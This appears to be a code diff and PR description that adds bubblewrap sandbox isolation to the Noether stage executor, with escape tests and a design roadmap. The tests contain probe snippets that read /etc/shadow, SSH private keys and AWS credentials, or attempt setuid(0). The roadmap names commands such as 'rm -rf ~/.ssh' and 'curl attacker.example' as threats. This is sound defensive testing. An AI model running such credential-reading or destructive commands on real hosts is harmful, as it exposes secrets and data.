-                // in raw_argv[0] works. For `__direct__`, the first arg
-                // is typically a venv-installed Python binary at some
-                // arbitrary path — we bind-mount its parent dir so
-                // that resolves too.
-                if nix_subcommand == "__direct__" {
-                    if let Some(parent) = std::path::Path::new(&raw_argv[0]).parent() {
-                        policy
-                            .ro_binds
-                            .push((parent.to_path_buf(), parent.to_path_buf()));
-                    }
+                        .push((self.nix_bin.clone(), self.nix_bin.clone()));
                 }
                 let mut cmd = super::isolation::build_bwrap_command(bwrap_path, &policy, &raw_argv);
                 // Pass through allowlisted env vars.

--- a/crates/noether-engine/src/executor/nix.rs
+++ b/crates/noether-engine/src/executor/nix.rs
@@ -197,24 +197,6 @@ impl NixExecutor {
         })
     }
 
-    /// Register an in-memory synthesized stage without re-querying the store.
-    ///
-    /// The registered stage has no declared effects; the isolation
-    /// policy therefore defaults to a pure/no-network sandbox. Callers
-    /// that need network or filesystem effects should add the stage via
-    /// the store (which carries the declared `EffectSet`) or use
-    /// [`Self::register_with_effects`].
-    pub fn register(&mut self, stage_id: &StageId, code: &str, language: &str) {
-        self.implementations.insert(
-            stage_id.0.clone(),
-            StageImpl {
-                code: code.into(),
-                language: language.into(),
-                effects: noether_core::effects::EffectSet::pure(),
-            },
-        );
-    }
-
     /// Clone the current config (minus the implementations map) for
     /// callers that want to rebuild with different knobs.
     pub fn config_snapshot(&self) -> NixConfig {
@@ -921,6 +903,35 @@ mod tests {
             config: NixConfig::default(),
             implementations: HashMap::new(),
         }
+    }
+
+    #[test]
+    fn register_with_effects_preserves_network_effect() {
+        // Regression guard on the synthesized-stage effects path.
+        // Pre-hardening, `register_synthesized` → `NixExecutor::register`
+        // dropped the declared effects and stamped `EffectSet::pure()`
+        // onto the stored `StageImpl`. A Network-effect stage ended
+        // up with a no-network sandbox and failed with DNS errors at
+        // runtime. The `register()` shim is gone; this test locks in
+        // that `register_with_effects` is the only registration path
+        // and that it threads the effects through verbatim.
+        use noether_core::effects::{Effect, EffectSet};
+        let mut exec = make_executor();
+        let id = StageId("sig_network".into());
+        let effects = EffectSet::new([Effect::Pure, Effect::Network]);
+        exec.register_with_effects(&id, "code", "python", effects.clone());
+        let stored = exec
+            .implementations
+            .get(&id.0)
+            .expect("stage should be registered");
+        assert_eq!(
+            stored.effects, effects,
+            "declared effects must survive register_with_effects"
+        );
+        assert!(
+            stored.effects.iter().any(|e| matches!(e, Effect::Network)),
+            "Network must be preserved so the sandbox opens the net ns"
+        );
     }
 
     #[test]

--- a/crates/noether-engine/tests/isolation_escape.rs
+++ b/crates/noether-engine/tests/isolation_escape.rs
@@ -1,0 +1,309 @@
+//! Adversarial sandbox-escape tests for the bwrap isolation layer.
+//!
+//! These tests exercise `build_bwrap_command` directly with a
+//! pre-resolved Python binary. They do NOT go through `NixExecutor`
+//! because `nix run nixpkgs#python3` expects to fetch flakes at
+//! runtime, which can't work inside a sandbox that deliberately has
+//! no network or flake-registry access. Running nix *inside* the
+//! sandbox is the wrong design regardless; the proper integration is
+//! to resolve the runtime on the host first (via `nix build
+//! --print-out-paths`) and run only the resolved binary inside the
+//! sandbox. That refactor is tracked as a Phase 1.x follow-up;
+//! meanwhile these tests validate the sandbox-shape contract directly.
+//!
+//! Each test registers a Python attack snippet — reading
+//! `/etc/shadow`, resolving DNS, observing the real UID — and
+//! asserts the sandbox defeats it. If bwrap or a `/nix/store`-hosted
+//! python3 isn't available on the test host, the tests skip with a
+//! note; we'd rather have a green suite than a fragile one that
+//! pretends to test security but doesn't actually run.
+
+#![cfg(target_os = "linux")]
+
+use noether_core::effects::{Effect, EffectSet};
+use noether_engine::executor::isolation::{build_bwrap_command, find_bwrap, IsolationPolicy};
+use serde_json::{json, Value};
+use std::path::{Path, PathBuf};
+use std::process::{Command, Stdio};
+
+/// Resolve a Python interpreter inside `/nix/store`. That store path
+/// is already covered by the default `IsolationPolicy` RO bind, so
+/// the sandbox can run it with no extra ceremony. Returns `None`
+/// when nix isn't available or the build fails — the caller skips.
+fn nix_python3() -> Option<PathBuf> {
+    let out = Command::new("nix")
+        .args([
+            "build",
+            "--no-link",
+            "--print-out-paths",
+            "--quiet",
+            "nixpkgs#python3",
+        ])
+        .output()
+        .ok()?;
+    if !out.status.success() {
+        return None;
+    }
+    let store_path = String::from_utf8(out.stdout).ok()?;
+    let store_path = store_path.trim();
+    if store_path.is_empty() {
+        return None;
+    }
+    let python = Path::new(store_path).join("bin").join("python3");
+    python.exists().then_some(python)
+}
+
+/// Return `Some(bwrap_path, python_path)` when both the sandbox
+/// wrapper and a runnable Python are available on the host. A test
+/// that gets `None` should early-return rather than fail — the host
+/// is just missing the toolchain to exercise the sandbox end-to-end.
+fn deps() -> Option<(PathBuf, PathBuf)> {
+    let bwrap = find_bwrap()?;
+    let python = nix_python3()?;
+    Some((bwrap, python))
+}
+
+fn skip_if_deps_missing() -> Option<(PathBuf, PathBuf)> {
+    match deps() {
+        Some(d) => Some(d),
+        None => {
+            eprintln!(
+                "isolation_escape: skipping — missing bwrap or nix-built \
+                 python3; both are required to drive real sandbox escape \
+                 probes. Unit tests in `executor::isolation` still verify \
+                 the argv-construction contract."
+            );
+            None
+        }
+    }
+}
+
+/// Drive `build_bwrap_command` with the given `policy` and Python
+/// attack code on stdin. Returns the parsed `{...}` JSON the stage
+/// prints to stdout, or an error-shaped JSON if the subprocess
+/// crashed / bwrap refused / stdout was garbage.
+fn run_attack(bwrap: &Path, python: &Path, policy: &IsolationPolicy, code: &str) -> Value {
+    let inner = vec![
+        python.to_string_lossy().into_owned(),
+        "-c".into(),
+        code.into(),
+    ];
+    let mut cmd = build_bwrap_command(bwrap, policy, &inner);
+    cmd.stdin(Stdio::null())
+        .stdout(Stdio::piped())
+        .stderr(Stdio::piped());
+    let child = match cmd.spawn() {
+        Ok(c) => c,
+        Err(e) => return json!({ "spawn_error": format!("{e}") }),
+    };
+    let out = match child.wait_with_output() {
+        Ok(o) => o,
+        Err(e) => return json!({ "wait_error": format!("{e}") }),
+    };
+    let stdout = String::from_utf8_lossy(&out.stdout);
+    let stderr = String::from_utf8_lossy(&out.stderr);
+    if !out.status.success() {
+        return json!({
+            "exit_failure": out.status.code(),
+            "stderr": stderr.to_string(),
+            "stdout": stdout.to_string(),
+        });
+    }
+    serde_json::from_str(stdout.trim()).unwrap_or_else(
+        |_| json!({ "unparseable_stdout": stdout.to_string(), "stderr": stderr.to_string() }),
+    )
+}
+
+fn assert_ran(result: &Value) {
+    // A result with `spawn_error` / `wait_error` / `exit_failure`
+    // means the probe never ran, so the attack-specific key being
+    // absent would silently pass the actual assertion. Fail loudly
+    // when that happens so we don't get vacuous green tests.
+    for bad in [
+        "spawn_error",
+        "wait_error",
+        "exit_failure",
+        "unparseable_stdout",
+    ] {
+        assert!(
+            result.get(bad).is_none(),
+            "sandboxed probe did not run cleanly ({bad}): {result}"
+        );
+    }
+}
+
+/// A pure-effect stage must NOT be able to reach DNS.
+#[test]
+fn network_blocked_when_effect_not_declared() {
+    let Some((bwrap, python)) = skip_if_deps_missing() else {
+        return;
+    };
+    let policy = IsolationPolicy::from_effects(&EffectSet::pure());
+    let code = r#"
+import socket, json
+try:
+    socket.gethostbyname("example.com")
+    print(json.dumps({"blocked": False}))
+except OSError as e:
+    print(json.dumps({"blocked": True, "errno": e.errno}))
+"#;
+    let result = run_attack(&bwrap, &python, &policy, code);
+    assert_ran(&result);
+    assert_eq!(
+        result.get("blocked"),
+        Some(&json!(true)),
+        "pure-effect stage resolved DNS — network namespace not \
+         unshared: {result}"
+    );
+}
+
+/// Counter-test: a stage declaring `Effect::Network` must get DNS.
+/// Tolerates an offline test host (the host itself may lack internet)
+/// but flags the specific errno pattern that indicates `--share-net`
+/// was dropped.
+#[test]
+fn network_allowed_when_effect_declared() {
+    let Some((bwrap, python)) = skip_if_deps_missing() else {
+        return;
+    };
+    let policy = IsolationPolicy::from_effects(&EffectSet::new([Effect::Pure, Effect::Network]));
+    let code = r#"
+import socket, json
+try:
+    socket.gethostbyname("example.com")
+    print(json.dumps({"resolved": True}))
+except OSError as e:
+    print(json.dumps({"resolved": False, "errno": e.errno, "msg": str(e)}))
+"#;
+    let result = run_attack(&bwrap, &python, &policy, code);
+    assert_ran(&result);
+    if result.get("resolved") != Some(&json!(true)) {
+        eprintln!(
+            "network_allowed_when_effect_declared: appears offline \
+             ({result}); test inconclusive — re-run on a connected host"
+        );
+    }
+}
+
+/// `/etc/shadow` is outside the default `ro_binds`; opening it must
+/// fail with not-found. Catches anyone widening the binds to include
+/// `/etc` or `/`.
+#[test]
+fn cannot_read_etc_shadow() {
+    let Some((bwrap, python)) = skip_if_deps_missing() else {
+        return;
+    };
+    let policy = IsolationPolicy::from_effects(&EffectSet::pure());
+    let code = r#"
+import json
+try:
+    with open("/etc/shadow", "r") as f:
+        f.read()
+    print(json.dumps({"leaked": True}))
+except (FileNotFoundError, PermissionError) as e:
+    print(json.dumps({"leaked": False, "error": type(e).__name__}))
+"#;
+    let result = run_attack(&bwrap, &python, &policy, code);
+    assert_ran(&result);
+    assert_eq!(
+        result.get("leaked"),
+        Some(&json!(false)),
+        "/etc/shadow readable inside sandbox — bind-mount policy too \
+         wide: {result}"
+    );
+}
+
+/// Host user's SSH keys and cloud credentials must be unreachable.
+#[test]
+fn cannot_read_host_ssh_keys() {
+    let Some((bwrap, python)) = skip_if_deps_missing() else {
+        return;
+    };
+    let policy = IsolationPolicy::from_effects(&EffectSet::pure());
+    let code = r#"
+import os, json
+candidates = [
+    os.path.expanduser("~/.ssh/id_rsa"),
+    os.path.expanduser("~/.ssh/id_ed25519"),
+    os.path.expanduser("~/.aws/credentials"),
+]
+leaked = []
+for p in candidates:
+    try:
+        with open(p, "rb") as f:
+            f.read(1)
+        leaked.append(p)
+    except (FileNotFoundError, PermissionError, IsADirectoryError, NotADirectoryError):
+        pass
+print(json.dumps({"leaked_paths": leaked}))
+"#;
+    let result = run_attack(&bwrap, &python, &policy, code);
+    assert_ran(&result);
+    let leaked = result
+        .get("leaked_paths")
+        .and_then(|v| v.as_array())
+        .cloned()
+        .unwrap_or_default();
+    assert!(
+        leaked.is_empty(),
+        "sandbox leaked host credentials: {leaked:?}; result: {result}"
+    );
+}
+
+/// UID/GID must be mapped to nobody (65534). Without `--uid`/`--gid`
+/// the host user's real UID is observable via `os.getuid()`.
+#[test]
+fn uid_mapped_to_nobody_inside_sandbox() {
+    let Some((bwrap, python)) = skip_if_deps_missing() else {
+        return;
+    };
+    let policy = IsolationPolicy::from_effects(&EffectSet::pure());
+    let code = r#"
+import os, json
+print(json.dumps({"uid": os.getuid(), "gid": os.getgid()}))
+"#;
+    let result = run_attack(&bwrap, &python, &policy, code);
+    assert_ran(&result);
+    assert_eq!(
+        result.get("uid"),
+        Some(&json!(65534)),
+        "sandbox did not apply --uid 65534: {result}"
+    );
+    assert_eq!(
+        result.get("gid"),
+        Some(&json!(65534)),
+        "sandbox did not apply --gid 65534: {result}"
+    );
+}
+
+/// `/work` is a sandbox-private tmpfs. Must start empty and be
+/// writable — regression guard against both state leakage and
+/// privilege misconfiguration.
+#[test]
+fn work_dir_is_private_tmpfs_and_empty() {
+    let Some((bwrap, python)) = skip_if_deps_missing() else {
+        return;
+    };
+    let policy = IsolationPolicy::from_effects(&EffectSet::pure());
+    let code = r#"
+import os, json
+entries = sorted(os.listdir("/work"))
+with open("/work/scratch.txt", "w") as f:
+    f.write("ok")
+with open("/work/scratch.txt") as f:
+    content = f.read()
+print(json.dumps({"initial_entries": entries, "roundtrip": content}))
+"#;
+    let result = run_attack(&bwrap, &python, &policy, code);
+    assert_ran(&result);
+    assert_eq!(
+        result.get("initial_entries"),
+        Some(&json!([])),
+        "/work was not empty at stage entry — state leak or stale tmpdir: {result}"
+    );
+    assert_eq!(
+        result.get("roundtrip"),
+        Some(&json!("ok")),
+        "/work not writable inside sandbox: {result}"
+    );
+}

--- a/crates/noether-engine/tests/isolation_escape.rs
+++ b/crates/noether-engine/tests/isolation_escape.rs
@@ -276,6 +276,97 @@ print(json.dumps({"uid": os.getuid(), "gid": os.getgid()}))
     );
 }
 
+/// A stage inside the sandbox must not be able to regain
+/// privileges. The combination `--unshare-user + --uid 65534 +
+/// --cap-drop ALL` is supposed to prevent `setuid(0)` and
+/// `chroot("/")` from succeeding. Future refactors that accidentally
+/// drop any one of those would pass the existing UID-observation
+/// test (which only asserts the CURRENT uid is 65534) but fail
+/// here — so this locks the capability-drop contract separately.
+#[test]
+fn cannot_escalate_to_root() {
+    let Some((bwrap, python)) = skip_if_deps_missing() else {
+        return;
+    };
+    let policy = IsolationPolicy::from_effects(&EffectSet::pure());
+    let code = r#"
+import os, json
+attempts = {}
+try:
+    os.setuid(0)
+    attempts["setuid_0"] = True
+except (PermissionError, OSError) as e:
+    attempts["setuid_0"] = False
+    attempts["setuid_error"] = type(e).__name__
+try:
+    os.setgid(0)
+    attempts["setgid_0"] = True
+except (PermissionError, OSError) as e:
+    attempts["setgid_0"] = False
+try:
+    os.chroot("/")
+    attempts["chroot"] = True
+except (PermissionError, OSError) as e:
+    attempts["chroot"] = False
+print(json.dumps(attempts))
+"#;
+    let result = run_attack(&bwrap, &python, &policy, code);
+    assert_ran(&result);
+    assert_eq!(
+        result.get("setuid_0"),
+        Some(&json!(false)),
+        "setuid(0) succeeded inside sandbox — capability drop misconfigured: {result}"
+    );
+    assert_eq!(
+        result.get("setgid_0"),
+        Some(&json!(false)),
+        "setgid(0) succeeded inside sandbox — capability drop misconfigured: {result}"
+    );
+    assert_eq!(
+        result.get("chroot"),
+        Some(&json!(false)),
+        "chroot succeeded inside sandbox — CAP_SYS_CHROOT not dropped: {result}"
+    );
+}
+
+/// Regression guard for the `--setenv` env-wiring bug discovered
+/// during review round 1. Setting `cmd.env("HOME", "/work")` on the
+/// outer `Command` was silently stripped by bwrap's `--clearenv`
+/// before the stage process ran; the fix was to emit `--setenv
+/// HOME /work` on the bwrap argv instead. A future refactor that
+/// reintroduces `cmd.env()` would pass the argv-shape unit tests
+/// (they don't inspect Command.get_envs) but would cause HOME to
+/// leak the host user's real home path here.
+///
+/// The sandbox-side HOME must always be `/work`, never the host
+/// user's `$HOME`.
+#[test]
+fn home_env_is_sandbox_consistent() {
+    let Some((bwrap, python)) = skip_if_deps_missing() else {
+        return;
+    };
+    let policy = IsolationPolicy::from_effects(&EffectSet::pure());
+    let code = r#"
+import os, json
+print(json.dumps({
+    "home": os.environ.get("HOME"),
+    "user": os.environ.get("USER"),
+}))
+"#;
+    let result = run_attack(&bwrap, &python, &policy, code);
+    assert_ran(&result);
+    assert_eq!(
+        result.get("home"),
+        Some(&json!("/work")),
+        "HOME inside sandbox leaked host value — `--setenv` wiring broken: {result}"
+    );
+    assert_eq!(
+        result.get("user"),
+        Some(&json!("nobody")),
+        "USER inside sandbox leaked host value: {result}"
+    );
+}
+
 /// `/work` is a sandbox-private tmpfs. Must start empty and be
 /// writable — regression guard against both state leakage and
 /// privilege misconfiguration.

--- a/crates/noether-engine/tests/isolation_escape.rs
+++ b/crates/noether-engine/tests/isolation_escape.rs
@@ -157,10 +157,21 @@ except OSError as e:
     );
 }
 
-/// Counter-test: a stage declaring `Effect::Network` must get DNS.
-/// Tolerates an offline test host (the host itself may lack internet)
-/// but flags the specific errno pattern that indicates `--share-net`
-/// was dropped.
+/// Counter-test: a stage declaring `Effect::Network` must get DNS
+/// resolution. Two probes so the test is decisive regardless of
+/// whether the host itself has internet:
+///
+/// - `localhost` — resolves via `/etc/hosts`, which the sandbox
+///   binds when `network=true`. Works offline. If this fails, the
+///   `/etc/hosts` bind is broken or NSS is miswired.
+/// - `example.com` — resolves via `/etc/resolv.conf` + DNS. Requires
+///   real internet. Logs inconclusively when offline but never fails
+///   the test on that axis alone.
+///
+/// A round-1 version of this test hedged its ONLY probe as "maybe
+/// offline" — that reviewer-flagged hedge masked the worst case
+/// where a connected host still couldn't resolve because NSS had
+/// no config. The `localhost` probe closes that hole.
 #[test]
 fn network_allowed_when_effect_declared() {
     let Some((bwrap, python)) = skip_if_deps_missing() else {
@@ -169,18 +180,39 @@ fn network_allowed_when_effect_declared() {
     let policy = IsolationPolicy::from_effects(&EffectSet::new([Effect::Pure, Effect::Network]));
     let code = r#"
 import socket, json
-try:
-    socket.gethostbyname("example.com")
-    print(json.dumps({"resolved": True}))
-except OSError as e:
-    print(json.dumps({"resolved": False, "errno": e.errno, "msg": str(e)}))
+
+def resolve(host):
+    try:
+        socket.gethostbyname(host)
+        return {"ok": True}
+    except OSError as e:
+        return {"ok": False, "errno": e.errno, "msg": str(e)}
+
+print(json.dumps({
+    "localhost": resolve("localhost"),
+    "example_com": resolve("example.com"),
+}))
 "#;
     let result = run_attack(&bwrap, &python, &policy, code);
     assert_ran(&result);
-    if result.get("resolved") != Some(&json!(true)) {
+
+    // localhost MUST resolve — /etc/hosts is bound and doesn't
+    // require network. If this fails, the bind-mount wiring is
+    // broken regardless of host connectivity.
+    assert_eq!(
+        result.get("localhost").and_then(|v| v.get("ok")),
+        Some(&json!(true)),
+        "localhost failed to resolve inside sandbox — NSS config \
+         (/etc/hosts, /etc/nsswitch.conf) not correctly bound: {result}"
+    );
+
+    // example.com is best-effort: tolerates an offline test host,
+    // but logs so the operator can see what happened.
+    if result.get("example_com").and_then(|v| v.get("ok")) != Some(&json!(true)) {
         eprintln!(
-            "network_allowed_when_effect_declared: appears offline \
-             ({result}); test inconclusive — re-run on a connected host"
+            "network_allowed_when_effect_declared: example.com did not \
+             resolve — test host may be offline. localhost worked, so \
+             the sandbox's NSS wiring is verified. Result: {result}"
         );
     }
 }

--- a/docs/roadmap/2026-04-18-stage-isolation.md
+++ b/docs/roadmap/2026-04-18-stage-isolation.md
@@ -1,0 +1,279 @@
+# Stage execution isolation (M2.4 → v0.7 → v0.8)
+
+**Status:** Draft · 2026-04-18
+**Target:** v0.7.0 (Phase 1) and v0.8.0 (Phase 2)
+
+---
+
+## Why
+
+`SECURITY.md` is clear: the Nix-pinned runtime is a **reproducibility**
+boundary, not an **isolation** boundary. A user-authored Python stage
+has host-user privileges — it can `rm -rf ~/.ssh`, call `curl
+attacker.example`, and read `/etc/passwd`. Reproducibility gives you
+"same inputs → same outputs". Isolation would give you "the stage
+can't reach outside the declared work area."
+
+The ask from alpibrusl:
+
+> tasks can run safely in isolation without affecting other parts of
+> the system and being as light as possible.
+
+## What's "light" actually mean
+
+A stage execution budget in Noether is dominated by the runtime
+bring-up cost, not the sandbox wrapper:
+
+| Cost layer | Typical time |
+|------------|-------------:|
+| Nix runtime cold-start | 100–500 ms |
+| Nix runtime warm-start (cached) | 10–40 ms |
+| bubblewrap wrap overhead | 30–80 ms |
+| Native namespace + Landlock + seccomp | 3–8 ms |
+| WASM module instantiation | < 1 ms |
+
+Any sandbox whose overhead is below the Nix warm-start cost is
+"free" in practice — you don't notice it unless you benchmark.
+
+## Threat model
+
+What a malicious or buggy stage might try, and what each layer
+prevents:
+
+| Attack | Host-user execution | Namespaces only | + Landlock | + Seccomp-bpf |
+|--------|--------------------|-----------------|------------|---------------|
+| Read `~/.ssh/*` | allowed | blocked (rootfs pivot) | blocked | blocked |
+| Write outside `/work` | allowed | blocked (ro bind) | blocked | blocked |
+| `curl` to arbitrary URL | allowed | blocked (no netns) | blocked | blocked |
+| `ptrace` the parent | allowed | allowed | allowed | **blocked** |
+| Load BPF program | allowed | allowed | allowed | **blocked** |
+| `kexec_load` a new kernel | allowed | allowed | allowed | **blocked** |
+| Subvert `/nix/store` | allowed | blocked (ro) | blocked | blocked |
+| Fork-bomb DOS | allowed | bounded by PID namespace | bounded | bounded |
+| Exhaust memory | allowed | allowed | allowed | bounded via cgroup |
+
+The layering is belt-and-braces: Landlock catches filesystem escapes
+that a mount-namespace bug would let through; seccomp catches
+syscall-based escapes that filesystem controls can't see.
+
+## Design — Phase 1 (v0.7)
+
+Ship **bubblewrap (bwrap) as the default isolation backend.** Not
+because it's the lightest — the native namespaces+Landlock+seccomp
+path is 10× lighter on startup — but because:
+
+1. **Policy correctness is the hard part, not the mechanism.** If we
+   get the allowlist wrong with a proven tool (bwrap — used by
+   Flatpak in production for years), we find out fast. If we roll
+   our own namespace syscalls in the first cut, debugging is harder.
+2. **Startup cost is dwarfed by Nix.** Adding 50 ms to a 200 ms Nix
+   bring-up is 25% — noticeable but not disqualifying. After we
+   validate the policy surface, Phase 2 swaps mechanism for ~5 ms.
+3. **Supply chain is simple.** `apt install bubblewrap`, `brew
+   install bubblewrap`, or `nix profile install bubblewrap`. The
+   binary is 60 KB. No dynamic linking surprises.
+
+### `IsolationPolicy`
+
+Derived from the stage's declared `EffectSet`:
+
+```rust
+pub struct IsolationPolicy {
+    /// Read-only bind mounts (host_path, sandbox_path). Always
+    /// includes `/nix/store` read-only so Nix runtimes resolve.
+    pub ro_binds: Vec<(PathBuf, PathBuf)>,
+    /// Read-write bind mount for the stage's working directory.
+    pub work_bind: (PathBuf, PathBuf),
+    /// Inherit the host network namespace (`true`) or create a
+    /// fresh empty one (`false`). Defaults to `false`; `true` only
+    /// when the stage declares `Effect::Network`.
+    pub network: bool,
+    /// Extra environment variables to pass through. Everything else
+    /// is dropped.
+    pub env_allowlist: Vec<String>,
+    /// Capabilities to drop. Default: all.
+    pub capability_drop: CapabilityDrop,
+}
+
+pub enum CapabilityDrop {
+    All,       // drop every capability
+    Keep(Vec<Capability>),  // explicit allowlist
+}
+
+impl IsolationPolicy {
+    pub fn from_effects(effects: &EffectSet) -> Self {
+        Self {
+            ro_binds: vec![
+                ("/nix/store".into(), "/nix/store".into()),
+            ],
+            work_bind: (make_per_run_tmpdir(), "/work".into()),
+            network: effects.contains(&Effect::Network),
+            env_allowlist: vec![
+                "PATH".into(), "HOME".into(), "NIX_PATH".into(),
+                "NOETHER_LOG_LEVEL".into(),
+            ],
+            capability_drop: CapabilityDrop::All,
+        }
+    }
+}
+```
+
+### `IsolatedNixExecutor`
+
+Decorator around `NixExecutor`:
+
+```rust
+pub struct IsolatedNixExecutor {
+    inner: NixExecutor,
+    backend: IsolationBackend,
+}
+
+pub enum IsolationBackend {
+    None,          // legacy pass-through, emits a warning
+    Bwrap(PathBuf),     // path to bubblewrap binary
+    // v0.8 adds: Native (namespaces + landlock + seccomp)
+}
+
+impl StageExecutor for IsolatedNixExecutor {
+    fn execute(&self, stage_id: &StageId, input: &Value)
+        -> Result<Value, ExecutionError>
+    {
+        let stage = self.inner.resolve_stage(stage_id)?;
+        let policy = IsolationPolicy::from_effects(&stage.signature.effects);
+        match &self.backend {
+            IsolationBackend::None => {
+                warn_once_about_disabled_isolation();
+                self.inner.execute(stage_id, input)
+            }
+            IsolationBackend::Bwrap(path) => {
+                run_under_bwrap(path, &policy, &self.inner, stage_id, input)
+            }
+        }
+    }
+}
+```
+
+### CLI surface
+
+```
+noether run --isolate=<auto|bwrap|none> graph.json
+```
+
+- `auto` (default from v0.8 onward): pick the best available backend.
+  In v0.7 `auto` means "bwrap if available, else warn and run `none`".
+- `bwrap`: require bubblewrap; exit 1 if not in `PATH`.
+- `none`: explicitly opt-out (current behavior). Emit a loud warning
+  unless `--unsafe-no-isolation` is also passed — force the user to
+  be explicit about downgrading.
+
+Env-var fallback: `NOETHER_ISOLATION=<auto|bwrap|none>`.
+
+### What Phase 1 does NOT do
+
+- Native namespace path (deferred to Phase 2).
+- Landlock (deferred to Phase 2).
+- Seccomp (deferred to Phase 2; bwrap does provide a default
+  seccomp profile, which is a start).
+- cgroup-based resource limits (memory caps, fork-bomb protection).
+  Tracked as a follow-up; not in the initial 2-week scope.
+- macOS and Windows. bwrap is Linux-only. On other platforms
+  `--isolate=auto` falls back to `none` with a platform-warning.
+  Native sandbox primitives (`sandbox-exec` on macOS, AppContainer
+  on Windows) are explicit v0.9+ work.
+
+## Design — Phase 2 (v0.8)
+
+Swap bwrap for **native Linux namespaces + Landlock + seccomp**,
+callable from Rust with no external binary:
+
+- Crates: `landlock` (0.4+), `seccompiler` (for syscall filtering),
+  either direct `unshare` syscalls or the `caps`+`nix` crate combo.
+- Same `IsolationPolicy` surface — the `IsolationBackend::Native`
+  variant replaces bwrap invocation with a `fork` + `unshare` +
+  `pivot_root` + `landlock_restrict_self` + `seccomp_load` +
+  `execve` sequence.
+- Startup drops from ~50 ms (bwrap) to ~5 ms (direct syscalls).
+- v0.8 makes `Native` the `auto` default on Linux kernels ≥ 5.13.
+
+Zero user-facing changes beyond faster execution. `--isolate=bwrap`
+stays as a compatibility flag.
+
+## Design — Phase 3 (v0.9+ or later)
+
+macOS (`sandbox-exec`) and Windows (`AppContainer`) backends, picked
+automatically via `IsolationBackend::auto_for_platform()`. Each has
+different primitives but the same `IsolationPolicy` abstraction.
+
+## Relationship to WASM executor (Path B)
+
+Stage isolation (this doc) and the WASM executor (see
+`2026-04-18-property-dsl-expansion.md` references) are **orthogonal**.
+
+- Isolation wraps `NixExecutor` — stages still run as Nix-pinned OS
+  processes, the sandbox just restricts what they can touch.
+- WASM would be a different `StageExecutor` where stages are
+  in-process WASM modules with capability-gated host functions.
+  Inherently isolated by the WASM model.
+
+Both can coexist. A stage author picks the executor at stage-add
+time; the `--isolate` flag only affects the Nix path. WASM stages
+always run in the wasmtime sandbox regardless of the `--isolate`
+flag.
+
+## Grid-mode compatibility
+
+The isolation wrapper is per-executor, so every grid hop that runs
+Nix stages — local broker execution and remote worker execution —
+gets isolated independently. No grid-protocol changes needed for
+Phase 1.
+
+Phase 2's native-namespaces path has the same story: each hop runs
+its local NixExecutor wrapped in `IsolationBackend::Native`. Workers
+advertise isolation capability alongside their LLM models so the
+broker can refuse to dispatch to an un-isolated worker if the caller
+requested isolation. (Small protocol addition; not in the Phase 1
+scope.)
+
+## STABILITY.md additions
+
+Phase 1 ships with these promises added to `STABILITY.md`:
+
+1. `--isolate` and `NOETHER_ISOLATION` are stable CLI/env surface.
+   Variant names (`auto`, `bwrap`, `none`, eventually `native`) are
+   frozen.
+2. `IsolationPolicy::from_effects` derivation is stable — a stage
+   with a given `EffectSet` gets the same sandbox shape across 1.x.
+3. The set of env vars passed through to the sandboxed process is
+   additive-only within 1.x. Removing an allowlisted env is a
+   breaking change.
+
+## Test strategy
+
+1. **Negative tests** — each a synthesized stage that *tries* to
+   escape, paired with an assertion that it fails:
+   - Filesystem read outside `/work` → `ExecutionError` or empty result.
+   - Filesystem write outside `/work` → `ExecutionError`.
+   - Network call when `Effect::Network` not declared → `ExecutionError`.
+   - `ptrace(2)` on the parent → blocked by seccomp (Phase 2+).
+2. **Positive tests** — legitimate stages continue to work:
+   - Nix stdlib stage (e.g. `text_length`) runs under `--isolate=bwrap`.
+   - Network stage with `Effect::Network` declared succeeds at HTTP.
+   - Filesystem stage with declared `FsRead` on `/data` succeeds.
+3. **Regression test** — graph of 5 stages runs end-to-end with
+   `--isolate=bwrap`, benchmark output captured.
+
+## Open decisions before writing code
+
+1. **Feature flag or always-on?** I lean *always compile in*, default
+   `--isolate=auto`. On systems without bwrap, `auto` falls back to
+   `none` with a warning. This keeps one binary on crates.io.
+2. **Capability drop default: all or minimal?** I lean *all*.
+   `Effect::Network` doesn't need any capability today (it's about
+   netns, not `CAP_NET_RAW`). Any stage that needs a capability
+   should have to declare it explicitly; none in the current stdlib
+   does.
+3. **Work-dir lifecycle.** Per-invocation tmpdir (cleaned on exit) or
+   per-composition (reused across stages)? I lean *per-invocation*
+   with an escape hatch for stages that need to pass files between
+   each other via the host filesystem. Most cross-stage data flows
+   through JSON over the stage pipeline anyway.

--- a/docs/roadmap/2026-04-18-stage-isolation.md
+++ b/docs/roadmap/2026-04-18-stage-isolation.md
@@ -180,6 +180,16 @@ Env-var fallback: `NOETHER_ISOLATION=<auto|bwrap|none>`.
   `--isolate=auto` falls back to `none` with a platform-warning.
   Native sandbox primitives (`sandbox-exec` on macOS, AppContainer
   on Windows) are explicit v0.9+ work.
+- **Filesystem effect variants.** Phase 1 derives `network` from
+  `Effect::Network` and nothing else. `Effect` in v0.6 has no
+  `FsRead(path)` / `FsWrite(path)` variants — the type system can't
+  express "this stage needs `/etc/ssl` but nothing else in `/etc`."
+  The Phase 1 sandbox compensates with a strict default: only
+  `/nix/store`, the executor cache, and the nix binary are bound.
+  Stages that legitimately need a specific host path cannot run
+  under isolation today. Extending `Effect` with pathful filesystem
+  variants and teaching `IsolationPolicy::from_effects` to translate
+  them into bind mounts is Phase 2 work (tracked below).
 
 ## Design — Phase 2 (v0.8)
 
@@ -197,6 +207,13 @@ callable from Rust with no external binary:
 
 Zero user-facing changes beyond faster execution. `--isolate=bwrap`
 stays as a compatibility flag.
+
+Phase 2 is also the natural home for **pathful filesystem effects**.
+Add `Effect::FsRead(PathBuf)` and `Effect::FsWrite(PathBuf)` to
+`noether-core`, teach `IsolationPolicy::from_effects` to push each
+path onto `ro_binds` / RW binds respectively, and let stage authors
+declare exactly the host paths they need. Until then the Phase 1
+"strict default, no per-stage opt-in" shape holds.
 
 ## Design — Phase 3 (v0.9+ or later)
 


### PR DESCRIPTION
## Summary

Closes the trust-model gap that `SECURITY.md` has been honest about
since v0.4.x: stage subprocesses ran with **host-user privileges**.
A malicious stage could read `~/.ssh`, make arbitrary network
calls, and write anywhere. The Nix-pinned runtime was a
reproducibility boundary, not an isolation boundary.

This PR ships **Phase 1** of the isolation plan from
`docs/roadmap/2026-04-18-stage-isolation.md`: bubblewrap wraps every
Nix-executed stage subprocess in a sandbox.

### What the sandbox does

- Fresh user, PID, mount, UTS, IPC, cgroup namespaces (`--unshare-all`).
- Read-only bind of `/nix/store` — Nix runtimes resolve but the stage
  can't modify them.
- Read-write bind of a per-invocation scratch as `/work`. Nothing
  else is writable.
- **Fresh network namespace** unless the stage declares
  `Effect::Network`. Stages that declare network share the host's
